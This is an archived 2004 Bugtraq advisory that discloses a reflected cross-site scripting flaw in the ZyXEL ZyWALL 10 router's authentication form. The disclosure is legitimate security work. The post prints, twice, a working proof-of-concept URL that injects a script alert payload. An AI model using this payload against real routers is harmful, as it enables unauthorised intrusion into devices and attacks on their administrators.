[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003e01c3d4a9$020a8030$0b3016ac@fucku>
Date: Wed, 7 Jan 2004 01:01:24 +0200
From: "Rafel Ivgi" <theinsider@....net.il>
To: <bugtraq@...urityfocus.com>
Subject: ZyXEL10 OF ZyWALL Series Router Cross Site Scripting Vulnerabillity
#######################################################################
Device: ZyXEL10 OF ZyWALL Series Router
Software: RomPager/4.07 UPnP/1.0
Vendor: http://www.zyxel.com
Versions: 4.07
Platforms: Windows
Bug: Cross Site Scripting Vulnerabillity
Risk: Low
Exploitation: Remote with browser
Date: 6 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
ZyXEL10 is a high quality VPN router. the ZyWALL 10 offers a powerful
firewall capability,
including Stateful Packet Inspection and Anti Denial of Service (D.o.S).
Device Details:
http://www.zyxel.com/product/model.php?indexcate=1022044503&indexFlagvalue=1
021873683
#######################################################################
======
2) Bug
======
The Vulnerabillity is Cross Site Scripting type. If an attacker will request
the followingurl from the server
http://<host>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>alert('XSS')</sc
ript>
XSS appears and the server allows an attacker to inject & execute scripts.
#######################################################################
===========
3) The Code
===========
http://<host>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>alert('XSS')</sc
ript>
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
Powered by blists - more mailing lists